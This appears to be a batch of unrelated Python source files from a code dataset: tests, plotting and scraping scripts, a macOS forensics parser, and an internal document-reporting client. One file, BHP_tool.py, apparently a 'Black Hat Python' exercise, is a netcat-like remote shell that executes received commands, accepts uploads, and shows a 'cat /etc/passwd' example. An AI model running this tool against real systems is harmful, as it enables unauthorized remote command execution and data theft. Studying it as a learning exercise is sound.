results = [2,1,1]\n for i in range(len(sentences)):\n self.assertEqual(sfe.caps_words(sentences[i]),results[i])\n\n def merge_two_dicts_test(self):\n dict1 = {\"a\":1,\"b\":2}\n dict2 = {\"c\":3,\"d\":4}\n dict_final = {\"a\":1,\"b\":2,\"c\":3,\"d\":4}\n self.assertEqual(sfe.merge_two_dicts(dict1,dict2),dict_final)\n\n def extract_unigrams_pos_test(self):\n\n sentences = [\"I love my new book\",\"This sunset is amazing\",\"that bike is from your brother\"]\n stopwords = [\"i\",\"my\",\"this\",\"is\",\"that\",\"from\",\"your\"]\n results = [(['love', 'new', 'book'], ['VBP', 'JJ', 'NN']),\n (['sunset', 'amazing'], ['NN', 'VBG']),\n (['bike', 'brother'], ['NN', 'NN'])]\n for i in range(len(sentences)):\n self.assertEqual(sfe.extract_unigrams_pos(sentences[i],stopwords),results[i])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"feature_extraction_test.py","file_name":"feature_extraction_test.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"299656293","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 17 16:58:37 2018\n\n@author: lagerwer\n\"\"\"\nimport numpy as np\nimport pylab as plt\nfig = plt.figure(0)\nx = np.arange(10.0)\ny = np.sin(np.arange(10.0) / 20.0 * np.pi)\n\nplt.errorbar(x, y, yerr=0.1)\n\ny = np.sin(np.arange(10.0) / 20.0 * np.pi) + 1\nplt.errorbar(x, y, yerr=0.1, uplims=True)\n\ny = np.sin(np.arange(10.0) / 20.0 * np.pi) + 2\nupperlimits = np.array([1, 0] * 5)\nlowerlimits = np.array([0, 1] * 5)\nplt.errorbar(x, y, yerr=0.1, uplims=upperlimits, lolims=lowerlimits)\n\nplt.xlim(-1, 10)","sub_path":"fig_test.py","file_name":"fig_test.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"39387466","text":"#!/usr/bin/env python\n\n'''\n@ author: Kshitij Kumar\n@ email: kshitijkumar14@gmail.com, kshitij.kumar@crowdstrike.com\n\n@ purpose:\n\nA module intended to parse the QuarantineEventsV2 database.\n\n'''\nimport os\nimport glob\nfrom collections import OrderedDict\n\n# IMPORT FUNCTIONS FROM COMMON.FUNCTIONS\nfrom automactc.modules.common.base import AutoMacTCModule\nfrom automactc.modules.common.functions import cocoa_time\nfrom automactc.modules.common.functions import query_db\nfrom automactc.utils.output import DataWriter\n\n\nclass QuarantinesModule(AutoMacTCModule):\n _mod_filename = __name__\n\n _headers = [\n 'user', 'timestamp', 'bundle_id', 'quarantine_agent', 'download_url', 'sender_name',\n 'sender_address', 'typeno', 'origin_title', 'origin_title', 'origin_url', 'origin_alias'\n ]\n\n def run(self):\n output = DataWriter(self.module_name(), self._headers, self.log, self.run_id, self.options)\n\n qevents_loc = os.path.join(self.options.inputdir, 'Users/*/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2')\n qevents_list = glob.glob(qevents_loc)\n qry = 'SELECT * FROM LSQuarantineEvent'\n\n if len(qevents_list) == 0:\n self.log.debug(\"Files not found in: {0}\".format(qevents_loc))\n\n for i in qevents_list:\n data = query_db(i, qry, self.options.outputdir)\n\n userpath = i.split('/')\n userindex = userpath.index('Users') + 1\n user = userpath[userindex]\n\n for item in data:\n item = list(item)\n record = OrderedDict((h, '') for h in self._headers)\n record['user'] = user\n record['timestamp'] = cocoa_time(item[1])\n record['bundle_id'] = item[2]\n record['quarantine_agent'] = item[3]\n record['download_url'] = item[4]\n record['sender_name'] = item[5]\n record['sender_address'] = item[6]\n record['typeno'] = str(item[7])\n record['origin_title'] = item[8]\n record['origin_url'] = item[9]\n record['origin_alias'] = item[10]\n\n line = [x.encode('utf-8') if isinstance(x, unicode) else x for x in record.values()]\n output.write_entry(line)\n","sub_path":"automactc/modules/mod_quarantines_v100.py","file_name":"mod_quarantines_v100.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"20620368","text":"import requests\nimport datetime\nfrom bs4 import BeautifulSoup\nfrom realtime.models import Earthquake\nfrom django.contrib.gis.geos import Point\nfrom django.utils import timezone\n\nurl = \"http://seismonepal.gov.np/earthquakes/2019\"\ntable_selector = \"tbody\", {\"id\": \"searchResultBody\"}\n\nfields = [\n \"date\",\n \"time\",\n \"latitude\",\n \"longitude\",\n \"magnitude\",\n \"remarks\",\n \"location\",\n]\n\n\ndef scrape_earthquakes():\n \"\"\"Scraping seismological data for different years from different places in Nepal\"\"\"\n rows = []\n\n r = requests.get(url)\n data = r.text\n soup = BeautifulSoup(data, \"html.parser\")\n article = soup.find(table_selector).find_all('tr')\n\n latest_event = datetime.datetime.fromtimestamp(0)\n latest_earthquake = Earthquake.objects.values('event_on').order_by('-event_on').first()\n\n if latest_earthquake:\n latest_event = latest_earthquake['event_on']\n latest_event = timezone.localtime(latest_event)\n latest_event = latest_event.replace(tzinfo=None)\n\n for element in article:\n texts = element.text.split(\"\\n\")\n rows.append(texts)\n\n for row in rows:\n earthquake = {}\n for i in range(0, len(fields)):\n earthquake[fields[i]] = row[i+1]\n\n earthquake['date'] = row[1][4:]\n earthquake['time'] = row[2][5:]\n if earthquake['time'] == \"N/A\":\n earthquake['time'] = \"00:00\"\n event_on = datetime.datetime.strptime(earthquake['date'] + ' ' + earthquake['time'], '%Y-%m-%d %H:%M')\n\n if event_on > latest_event:\n Earthquake.objects.create(\n event_on=event_on,\n point=Point(float(earthquake['longitude']), float(earthquake['latitude'])),\n magnitude=earthquake['magnitude'],\n description=earthquake['remarks'],\n address=earthquake['location'],\n )\n","sub_path":"misc/scraper/seismology.py","file_name":"seismology.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"498702675","text":"import math\ndef fac(c) :\n\t\n\toren=\"This is a ore number {}\"\n\toren1=\"This isnt a ore number {} \"\n\tarr = []\n\ty=0\n\tden=0\n\tfor i in range(1,c+1):\n\t\tif c%i==0:\n\t\t\tarr.insert(i-1,i)\n\t\t\ty+=1\t\t\n\tfor i in range(0,y):\n\t\tden+=c/arr[i]\n\t\n\tden=den/c\n\thm=y/den\n \n\tif hm-int(hm)==0:\n\t\tprint(oren.format(c))\n\n\t#else:\n\t#\tprint(oren1.format(c))\nif __name__ == \"__main__\": \n\tfor g in range(1,6500):\n\t\tfac(g)\n","sub_path":"ppl assignments/ore.py","file_name":"ore.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"557658386","text":"import heapq\n\nclass Pessoa:\n def __init__(self, nome):\n self.nome = nome\n\n # private method to represent the object in a readable way\n def __repr__(self):\n return self.nome\n\n\nclass PriorityQueue:\n def __init__(self):\n self._queue = []\n self._index = 0\n\n def insert(self, item, priority):\n heapq.heappush(self._queue, (-priority, self._index, item))\n self._index += 1\n\n def remove(self):\n return heapq.heappop(self._queue)[-1]\n\n\np1 = Pessoa('Julio 1')\nprint(p1)\n\np2 = Pessoa('Julio 2')\nprint(p2)\n\np3 = Pessoa('Julio 3')\nprint(p3)\n\np4 = Pessoa('Julio 4')\nprint(p4)\n\nprint(\"\\n\")\n\n\nq = PriorityQueue()\n\nq.insert(p1, 40)\nq.insert(p2, 25)\nq.insert(p3, 5)\nq.insert(p3, 15)\n\nprint(q.remove())\n# p1 Julio 1\n","sub_path":"classes/heap_queue.py","file_name":"heap_queue.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"102565098","text":"import cv2\nimport sys\nimport numpy as np\n\n'''\nReturns an array of frames and the frame count\n'''\n\ndef crop_image(I):\n (tr, tc, _) = I.shape\n ntc = int(tc / 2.0)\n offset = int(ntc / 2.0)\n cropped_frame = np.zeros((tr, ntc, 3))\n for i in range(ntc):\n cropped_frame[:, i] = I[:, i + offset]\n return cropped_frame\n\ndef video_to_image(filename, label):\n vidcap = cv2.VideoCapture(filename)\n success, image = vidcap.read()\n frame_count = 0\n success = True\n frames = []\n while success:\n success, image = vidcap.read()\n if (success):\n if label == \"src\":\n image = crop_image(image)\n frames.append(image)\n cv2.imwrite(\"frames/\" + label + \"-frame%03d.jpg\" % frame_count, image) # save frame as JPEG file\n frame_count += 1\n \n return np.array(frames), frame_count\n\n\n","sub_path":"video_to_image.py","file_name":"video_to_image.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"317952721","text":"\n'''\nAuthor: Taylor Cochran\nBook: Black Hat Python\nCh 2\n\ngoal: Learn to design a \"netcat\" like tool\n'''\n\nimport sys\nimport socket\nimport getopt\nimport threading\nimport subprocess\n\nclass NetTool(object):\n def __init__(self, listen=False, command=False, \n upload=False, execute=\"\", target=\"\",\n destination=\"\", port=0):\n self.listen = listen\n self.command = command\n self.upload = upload\n self.execute = execute\n self.target = target\n self.destination = destination\n self.port = port\n\n def usage(self):\n ''' Displays the usage info for this BHP too'''\n print(\"BHP Net Tool\")\n print(\"\")\n print(\"Usage: BHP_tool.py -t targe_host -p port\")\n print(\"-l --listen - listen on [host]:[port] for\")\n print(\" incomming connections\")\n print(\"-e --execute=file_to_run - execute the given file upon\")\n print(\" receiving a connection\")\n print(\"-c --commandshell - initilize a command shell\")\n print(\"-u --upload=destination - upon receiving connection upload a\")\n print(\" file and write to [destination]\")\n print(\"\")\n print(\"\")\n print(\"Examples: \")\n print(\"BHP_tool.py -t 192.168.0.1 -p 5555 -l -c\")\n print(\"BHP_tool.py -t 192.168.0.1 -p 5555 -l -u=/target.exe\")\n print(\"BHP_tool.py -t 192.168.0.1 -p 5555 -l -e=\\\"cat /etc/passwd\\\"\")\n print(\"echo 'ASDASD' | ./BHP_tool.py -t 192.168.0.1 -p 135\")\n sys.exit(0)\n\n def main(self):\n ''' Executes the main functonality of the net tool'''\n if not len(sys.argv[1:]):\n self.usage()\n\n # read the options\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"hle:t:p:cu\", \n [\"help\", \"listen\", \"execute\",\n \"target\", \"port\", \"command\",\n \"upload\"])\n except getopt.GetoptError as e:\n print(str(e))\n usage()\n\n for o, a in opts:\n if o in (\"-h\", \"--help\"):\n usage()\n elif o in (\"-l\", \"--listen\"):\n self.listen = True\n elif o in (\"-e\", \"--execute\"):\n self.execute = a\n elif o in (\"-c\", \"--commandshell\"):\n self.command = True\n elif o in (\"-u\", \"-upload\"):\n self.destination = a\n elif o in (\"-t\", \"--target\"):\n self.target = a\n elif o in (\"-p\", \"--port\"):\n self.port = int(a)\n else:\n assert False, \"Unhadled Option\"\n # listen or just send data\n if not self.listen and len(self.target) and self.port > 0:\n # read in the buff from the cmdlin\n # use ctrl-d if no input \n buff = sys.stdin.read()\n\n # send data off\n self.client_sender(buff)\n # otherwise we listen\n if self.listen:\n self.server_loop()\n\n def client_sender(self, buff):\n '''Sends the passed buff to the connected client'''\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n try:\n # connect to the target\n client.connect((self.target, self.port))\n\n if len(buff):\n buff = self.to_bytes(buff)\n client.send(buff)\n\n while True:\n # wait for reply\n recv_len = 1\n response = \"\"\n\n while recv_len:\n data = client.recv(4096)\n data = self.to_str(data)\n recv_len = len(data)\n response += data\n\n if recv_len < 4096:\n break\n response = self.to_str(response)\n print(response)\n # wait for more input\n buff = input(\"\")\n buff += \"\\n\"\n buff = self.to_bytes(buff)\n # send data\n client.send(buff)\n except Exception as e:\n print(\"[*] Exception! Exiting...\")\n print(e)\n client.close()\n\n def server_loop(self):\n ''' The main server loop '''\n if not len(self.target):\n self.target = \"0.0.0.0\"\n\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server.bind((self.target, self.port))\n server.listen(5)\n\n while True:\n client_socket, addr = server.accept()\n\n # spin up a thread to handle our new client\n client_thread = threading.Thread(target=self.client_handler, args=(client_socket,))\n client_thread.start()\n\n def run_command(self):\n ''' Inturprets the passed commands'''\n self.command = self.command.rstrip()\n\n # get output \n try:\n output = subprocess.check_output(self.command, \n stderr=subprocess.STDOUT, \n shell=True)\n except Exception as e:\n output = \"Failed to execute command.\\r\\n\"\n print(e)\n return output\n\n def client_handler(self, client_socket):\n ''' file uploads, comd execution, and shell'''\n if len(self.destination):\n file_buffer = \"\"\n while True:\n data = client_socket.recv(1024)\n if not data:\n break\n else:\n file_buffer += data\n # take the input and write it out\n try:\n with open(self.destination, \"wb\") as file_descriptor:\n file_descriptor.write(file_buffer)\n send = self.to_bytes(\"Successfully saved file to %s\\r\\n\" % self.destination)\n client_socket.send(send)\n except:\n send = self.to_bytes(\"Failed to save file %s\\r\\n\" % self.destination)\n client_socket.send(send)\n # check for command \n if len(self.execute):\n # run the command\n output = self,run_command(self.execute)\n output = self.to_bytes(output)\n client_socket.send(output)\n\n # now we enter another loop if shell was requested\n if self.command:\n while True:\n prompt = self.to_bytes(\"\")\n client_socket.send(prompt)\n command_buffer = \"\"\n while \"\\n\" not in command_buffer:\n request = client_socket.recv(1024)\n command_buffer += self.to_str(request)\n\n # send response\n self.command = self.to_bytes(command_buffer)\n response = self.run_command()\n response = self.to_bytes(response)\n client_socket.send(response)\n\n def to_str(self, str_or_byte):\n '''Decodes the passed str or bytes from utf-8'''\n if isinstance(str_or_byte, bytes):\n str_or_byte = str_or_byte.decode('utf-8')\n return str_or_byte\n\n def to_bytes(self, str_or_byte):\n '''Encodes the passed str or bytes into utf-8'''\n if isinstance(str_or_byte, str):\n str_or_byte = str_or_byte.encode('utf-8')\n return str_or_byte\n\n\nif __name__ == '__main__':\n tool = NetTool()\n tool.main()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"2_Ch/BHP_tool.py","file_name":"BHP_tool.py","file_ext":"py","file_size_in_byte":6510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"146106348","text":"import requests\nimport time\nimport csv\nimport re\n\n\nURL = \"https://if.isuo.org/authorities/schools-list/id/626\"\n\ndef get_inner_contents_of_tag(text):\n inner_text = re.findall('>(.*?)<', text)\n return ' '.join(inner_text)\n\ndef write_data_into_csv_file(data):\n header = ['Name of school', 'Phone numbers', 'E-mail']\n with open('result.csv', 'w') as f:\n writer = csv.writer(f)\n writer.writerow(header)\n writer.writerows(data)\n\ndef find_all_tags(source, tag):\n \"\"\" Return list of all found tags.\n\n Will be returned just inner contents without tags \"\"\"\n\n pattern = '<{}.*?>(.*?)'.format(tag, tag)\n\n return re.findall(pattern, source, re.DOTALL)\n\ndef get_urls_of_schools(source):\n\n # get table from html code\n table = find_all_tags(source, 'table')[0]\n\n table_rows = find_all_tags(table, 'tr')\n\n urls = list()\n # loop over all row except first(header)\n for row in table_rows[1:]:\n\n # get all cells from row\n cells = find_all_tags(row, 'td')\n\n try:\n url = re.search('\"([\\w/]+)\"', cells[1]).group(1)\n urls.append('https://if.isuo.org' + url)\n except IndexError:\n pass\n\n return urls\n\ndef decode(string):\n\n encoded_email = re.search(\"'([\\w%]+?)'\", string)\n\n if encoded_email:\n lst = encoded_email.group(1).split('%')[1:]\n decoded_email = map(lambda x: chr(int(x, 16)), lst)\n email = get_inner_contents_of_tag(''.join(decoded_email))\n return email\n return None\n\ndef get_name_phone_email(html):\n\n name_pattern = 'Повна назва:.*?(.*?)'\n name = re.search(name_pattern, html, re.DOTALL).group(1).strip()\n\n phone_pattern = 'Телефони:.*?(.*?)'\n phones = re.search(phone_pattern, html, re.DOTALL).group(1).strip()\n\n email_pattern = 'E-mail:.*?(.*?)'\n email = re.search(email_pattern, html, re.DOTALL).group(1)\n email = decode(email)\n\n return name, phones, email\n\ndef get_data(source):\n\n result = list()\n urls = get_urls_of_schools(source)\n\n for url in urls:\n print(url)\n response = requests.get(url)\n name_of_school, phone, email = get_name_phone_email(response.text)\n result.append([name_of_school, phone, email])\n\n # to not get banned wait 1sec.\n time.sleep(1)\n # break\n\n return result\n\ndef main():\n\n response = requests.get(URL)\n\n data = get_data(response.text)\n\n write_data_into_csv_file(data)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scraping/schools.py","file_name":"schools.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"312862169","text":"import requests\n# Disable HTTPS verification warnings.\ntry:\n from requests.packages import urllib3\nexcept ImportError:\n pass\nelse:\n urllib3.disable_warnings()\nimport urllib\nimport json\nimport re\nimport logging\nimport mailbox\nfrom HTMLParser import HTMLParser\nfrom bs4 import BeautifulSoup\nimport bs4\nimport datetime\nimport gzip\nimport os\nfrom mojo_auth import mojo_auth\n\n\nclass MOJOSession(object):\n def __init__(self):\n self.s = requests.Session()\n headers = {'Content-Type': 'application/json'}\n self.s.headers.update(headers)\n self.cookies = mojo_auth()\n self.r = None\n\n def get(self, url):\n logging.debug(\"Making api get call to %s\" % url)\n try:\n self.r = self.s.get(url, cookies=self.cookies)\n except:\n logging.error(\"connection to mojo failed\")\n # convert response to json\n return self.__json()\n\n def post(self, url, data):\n logging.debug(\"Making api post call to %s\" % url)\n try:\n self.r = self.s.post(url, data=data, cookies=self.cookies)\n except:\n logging.error(\"connection to mojo failed\")\n # convert response to json\n return self.__json()\n\n def put(self, url, data):\n logging.debug(\"Making api put call to %s\" % url)\n try:\n self.r = self.s.put(url, data=data, cookies=self.cookies)\n except:\n logging.error(\"connection to mojo failed\")\n # convert response to json\n return self.__json()\n\n def delete(self, url):\n logging.debug(\"Making api delete call to %s\" % url)\n try:\n self.r = self.s.delete(url, cookies=self.cookies)\n except:\n logging.error(\"connection to mojo failed\")\n\n def __json(self):\n json_string = re.sub(r\"throw.*;\\s*\", \"\", self.r.text)\n try:\n json_obj = json.loads(json_string)\n return json_obj\n except:\n logging.error(\"Unable to convert string to json\\n %s\" % json_string)\n\n\nclass MOJOApi(MOJOSession):\n def __init__(self):\n super(MOJOApi, self).__init__()\n base_url = \"https://mojo.redhat.com/api/core/v3/\"\n self.base_url = base_url\n\n def document2content(self, doc_id):\n \"\"\" Get content_id from document_id \"\"\"\n logging.info(\"Getting content_id from document_id %s\" % doc_id)\n url = requests.compat.urljoin(self.base_url, \"contents?filter=entityDescriptor(102,%s)\" % doc_id)\n j_content = self.get(url)\n if self.r.status_code == 404:\n logging.error(\"Document %s not found.\" % doc_id)\n exit(self.r.status_code)\n if len(j_content['list']) != 1:\n logging.error(\"document2content return %s contents\" % len(j_content['list']))\n url_content = j_content['list'][0]['resources']['self']['ref']\n return url_content\n\n def create_document(self, subject, text, place_id=None):\n \"\"\" Create document \"\"\"\n logging.info(\"Creating document\")\n j_doc = dict(content={\"type\": \"text/html\"}, type=\"document\")\n j_doc[\"subject\"] = subject\n j_doc[\"content\"][\"text\"] = text\n if place_id:\n j_doc[\"visibility\"] = \"place\"\n j_doc[\"parent\"] = requests.compat.urljoin(self.base_url, \"places/%s\" % place_id)\n str_doc = json.dumps(j_doc)\n url = requests.compat.urljoin(self.base_url, \"contents\")\n j_doc = self.post(url, str_doc)\n url_doc = j_doc[\"resources\"][\"html\"][\"ref\"]\n return url_doc\n\n def update_document(self, doc_id, text):\n \"\"\" Update document \"\"\"\n logging.info(\"Update document %s\" % doc_id)\n url_content = self.document2content(doc_id)\n j_doc = self.get(url_content)\n j_doc[\"content\"][\"text\"] = '

      ' + text + '

      '\n str_doc = json.dumps(j_doc)\n self.put(url_content, str_doc)\n if self.r.status_code != 200:\n logging.error(\"Update doc %s error with code %s, text %s\" % (doc_id, self.r.status_code, self.r.text))\n return self.r.status_code\n return 0\n\n def delete_document(self, doc_id):\n \"\"\" Delete document \"\"\"\n logging.info(\"Delete document %s\" % doc_id)\n url_content = self.document2content(doc_id)\n self.delete(url_content)\n if self.r.status_code != 204:\n logging.error(\"Delete doc %s error with code %s, text %s\" % (doc_id, self.r.status_code, self.r.text))\n return self.r.status_code\n return 0\n\n def get_document(self, doc_id):\n \"\"\" Get document \"\"\"\n logging.info(\"Get document %s\" % doc_id)\n url_content = self.document2content(doc_id)\n doc = self.get(url_content)\n html = self.get_html(doc, prettify=False)\n if self.r.status_code != 200:\n logging.error(\"GET doc %s error with code %s, text %s\" % (doc_id, self.r.status_code, self.r.text))\n return self.r.status_code\n return html\n\n def get_user(self, username):\n \"\"\" Get user info from mojo \"\"\"\n logging.info(\"Getting username %s\" % username)\n url = requests.compat.urljoin(self.base_url, \"people/username/%s\" % username)\n return self.get(url)\n\n def create_task(self, place_id, data):\n \"\"\" Create task in mojo place (project)\"\"\"\n logging.info(\"Creating task: %s\" % data['subject'])\n url = requests.compat.urljoin(self.base_url, \"places/%s/tasks\" % place_id)\n return self.post(url, json.dumps(data))\n\n def create_project(self, parent_place_id, name, display_name, start_date, due_date, **kwargs):\n \"\"\" Create project in mojo place (place)\"\"\"\n data = dict(\n parent=requests.compat.urljoin(self.base_url, \"places/%s\" % parent_place_id),\n name=name,\n displayName=display_name,\n startDate=start_date.strftime(\"%Y-%m-%dT%H:%M:%S%z\") if type(start_date) is datetime else start_date, # required in \"2012-07-02T07:00:00.000+0000\" format\n dueDate=due_date.strftime(\"%Y-%m-%dT%H:%M:%S%z\") if type(due_date) is datetime else due_date, # required in \"2012-07-02T07:00:00.000+0000\" format\n type=\"project\",\n )\n data.update(kwargs)\n logging.info(\"Creating project: %s\" % data)\n url = requests.compat.urljoin(self.base_url, \"places\")\n return self.post(url, json.dumps(data))\n\n def create_checkpoints(self, place_id, data):\n \"\"\" Create checkpoints for a mojo project\"\"\"\n logging.info(\"Creating project checkpoints\")\n url = requests.compat.urljoin(self.base_url, \"checkpoints/%s\" % place_id)\n return self.post(url, json.dumps(data))\n\n @staticmethod\n def get_html(j_doc, prettify=True):\n \"\"\" Parse html content for document \"\"\"\n # parser = MyHTMLParser()\n # parser.feed(j_doc[\"content\"][\"text\"])\n soup = BeautifulSoup(j_doc[\"content\"][\"text\"])\n doc_body = ''\n for i in soup.find('div', {'class': 'jive-rendered-content'}).contents:\n doc_body += str(i)\n if not prettify:\n return doc_body\n soup = BeautifulSoup(doc_body)\n f = open(\"soap.html\", 'w')\n doc_body = soup.prettify()\n f.write(doc_body.encode(\"UTF-8\"))\n f.close()\n return doc_body\n\n @staticmethod\n def text2html(text):\n \"\"\" Generate html \"\"\"\n html_src = ''\n for l in text.splitlines():\n if re.match('^\\s*$', l):\n html_src += '

      \\n'\n else:\n l = l.replace('&', '&')\n l = l.replace('<', '<')\n l = l.replace('>', '>')\n html_src = html_src + '

      '+l+'

      \\n'\n html_src += ''\n # for debugging\n # f = open('test.html', 'w')\n # f.write(html_src)\n # f.close()\n\n return html_src\n\n\nclass EmailHelper(object):\n def __init__(self, mail_list=None, tmp_dir='/tmp/', filter_method='default', filter_key=None):\n self.tmp_dir = tmp_dir\n if not mail_list:\n self.email_archives = 'http://post-office.corp.redhat.com/archives/virt-qe-list/'\n else:\n self.email_archives = 'http://post-office.corp.redhat.com/archives/' + mail_list + '/'\n r = urllib.urlopen(self.email_archives)\n if r.code != 200:\n logging.error('Invalid mail list given: %s, HTTP request got error code: %s' % (mail_list, r.code))\n exit(r.code)\n self.filter_method = filter_method\n if filter_key:\n self.filter_key = filter_key\n else:\n self.filter_key = ''\n\n def download_mbox(self, name):\n download_url = self.email_archives + name + '.txt.gz'\n local_path_zipped = self.tmp_dir + name + '.txt.gz'\n local_path = self.tmp_dir + name + '.txt'\n urllib.urlretrieve(download_url, local_path_zipped)\n in_f = gzip.GzipFile(local_path_zipped, 'rb')\n s = in_f.read()\n in_f.close()\n out_f = file(local_path, 'wb')\n out_f.write(s)\n out_f.close()\n\n def load_mbox(self, name):\n file_name = self.tmp_dir + name + '.txt'\n mbox = mailbox.mbox(file_name)\n for message in mbox:\n # print re.sub('\\n\\s+', ' ', message['subject'])\n if self.filter(message):\n yield {\"subject\": re.sub('\\n\\s+', ' ', message['subject']), \"body\": self.get_body(message)}\n mbox.close()\n\n def clean_mbox(self, name):\n os.remove(self.tmp_dir + name + '.txt')\n os.remove(self.tmp_dir + name + '.txt.gz')\n\n @staticmethod\n def get_body(msg):\n body = None\n # Walk through the parts of the email to find the text body.\n if msg.is_multipart():\n for part in msg.walk():\n # If part is multipart, walk through the subparts.\n if part.is_multipart():\n for subpart in part.walk():\n if subpart.get_content_type() == 'text/plain':\n # Get the subpart payload (i.e the message body)\n body = subpart.get_payload(decode=True)\n # charset = subpart.get_charset()\n # Part isn't multipart so get the email body\n elif part.get_content_type() == 'text/plain':\n body = part.get_payload(decode=True)\n # charset = part.get_charset()\n # If this isn't a multi-part message then get the payload (i.e the message body)\n elif msg.get_content_type() == 'text/plain':\n body = msg.get_payload(decode=True)\n # special handling for Thunderbird which use markup syntax in text/plain\n for header in msg._headers:\n if header[0] == 'User-Agent' and 'Thunderbird' in header[1]:\n tmp = body.replace('*', ' ')\n body = re.sub('<[^>]*>', '', tmp)\n return body\n\n def filter_body(self, msg):\n body = self.get_body(msg)\n if type(body) is not str:\n return False\n if self.filter_key in body:\n return True\n else:\n return False\n\n def filter_subject(self, msg):\n if self.filter_key == '':\n self.filter_key = '^RHEV-H 7.0 for RHEV 3.5*'\n if re.match(self.filter_key, msg['subject'], re.DOTALL):\n return True\n else:\n return False\n\n def filter_from(self, msg):\n if self.filter_key in msg._from:\n return True\n else:\n return False\n\n def filter(self, msg):\n if self.filter_method == 'subject':\n return self.filter_subject(msg)\n elif self.filter_method == 'from':\n return self.filter_from(msg)\n elif self.filter_method == 'body':\n return self.filter_body(msg)\n else:\n return self.filter_subject(msg)\n\n\nclass Report(object):\n \"\"\"\n report={'month': 'yyyy-mm', 'ref': 'email'}\n email={'subject': 'xxxx', 'body': 'xxxx', 'ref': 'mojo_link'}\n \"\"\"\n def __init__(self, mojo, months=None, skip=0, place_id=None, doc_id=None, title='MOJO Report', mail_list=None, filter_method='subject', filter_key=None):\n self.mojo = mojo\n self.email = EmailHelper(mail_list=mail_list, filter_method=filter_method, filter_key=filter_key)\n self.months_update = []\n self.months_list = {}\n self.title = title\n if not months:\n months = 3\n if place_id:\n try:\n test_place_id = int(place_id)\n logging.info(\"Place ID = %d\" % test_place_id)\n self.place_id = test_place_id\n except ValueError:\n self.place_id = None\n logging.error(\"Place ID is string: %s\" % place_id)\n else:\n self.place_id = None\n # for existing report, load it first and update the specify months\n # for new report, create a new mojo page and load specify months\n if doc_id:\n self.load_report()\n date = datetime.datetime.now()\n if skip > 0:\n for i in range(skip):\n date = datetime.date(day=1, month=date.month, year=date.year) - datetime.timedelta(days=1)\n for d in range(months):\n year = date.year\n month = date.strftime(\"%m\")\n logging.debug(\"Month will be processed: %s\" % str(year) + str(month))\n self.months_update.append(str(year) + str(month))\n date = datetime.date(day=1, month=date.month, year=date.year) - datetime.timedelta(days=1)\n\n @staticmethod\n def gen_report(test_list, catalog):\n html_src = '

      '+catalog+'

      \\n'\n for i in test_list:\n html_src = html_src + '

      ' + i['subject'] + '

      \\n'\n html_src += '

       

      \\n'\n return html_src\n\n def publish_report(self, doc_id=None, dry_run=False):\n html_src = ''\n for month in self.months_update:\n if month in self.months_list:\n report_items = self.months_list[month]\n else:\n report_items = []\n self.months_list[month] = report_items\n date = datetime.datetime.strptime(month, '%Y%m')\n month = date.strftime('%Y-%B')\n self.email.download_mbox(month)\n emails = self.email.load_mbox(month)\n for i in emails:\n new = False\n if not any(d['subject'] == i['subject'] for d in report_items):\n new = True\n if new and not dry_run:\n mojo_link = self.mojo.create_document(i['subject'], self.mojo.text2html(i['body']).replace('\\n', ''), place_id=self.place_id)\n i['ref'] = mojo_link\n report_items.append(i)\n logging.info(i['subject'])\n logging.info(i['ref'])\n elif new and dry_run:\n i['ref'] = 'dry_run'\n report_items.append(i)\n logging.info(i['subject'])\n logging.info(i['ref'])\n self.email.clean_mbox(month)\n html_src += self.gen_report(report_items, month)\n if dry_run:\n logging.info(html_src)\n return\n\n if doc_id:\n self.mojo.update_document(doc_id, html_src)\n else:\n mojo_link = self.mojo.create_document(self.title, html_src, place_id=self.place_id)\n logging.info('Here is the mojo link for final report: %s' % self.title)\n logging.info(mojo_link)\n\n def load_report(self, doc_id):\n html = self.mojo.get_document(doc_id)\n soup = BeautifulSoup(html)\n report_items = []\n old_month = '000000'\n for i in soup.find_all('p'):\n if type(i.next) is not bs4.element.Tag:\n continue\n if i.next.name == 'span' and 'style' in i.next.attrs:\n date = datetime.datetime.strptime(i.text, '%Y-%B')\n cur_month = date.strftime('%Y%m')\n if cur_month != old_month and old_month != '000000':\n self.months_list[old_month] = report_items\n report_items = []\n old_month = cur_month\n if i.next.name == 'a' and 'href' in i.next.attrs:\n item = {'subject': i.text.encode(\"ascii\"), 'ref': i.next.attrs['href']}\n report_items.append(item)\n if old_month != '000000':\n self.months_list[old_month] = report_items\n\n def delete_report(self, doc_id=None):\n if doc_id is None:\n return 1\n url_content = self.mojo.document2content(doc_id)\n j_doc = self.mojo.get(url_content)\n html = self.mojo.get_html(j_doc)\n soup = BeautifulSoup(html, \"lxml\")\n for a in soup.findAll('a'):\n url = a['href']\n logging.info(url)\n id = re.sub(r'https://mojo.redhat.com/docs/DOC-', \"\", url)\n self.mojo.delete_document(id)\n\n\nclass MyHTMLParser(HTMLParser):\n def __init__(self):\n HTMLParser.__init__(self)\n self.recording = 0\n self.data = []\n self.count = 0\n\n def handle_starttag(self, tag, 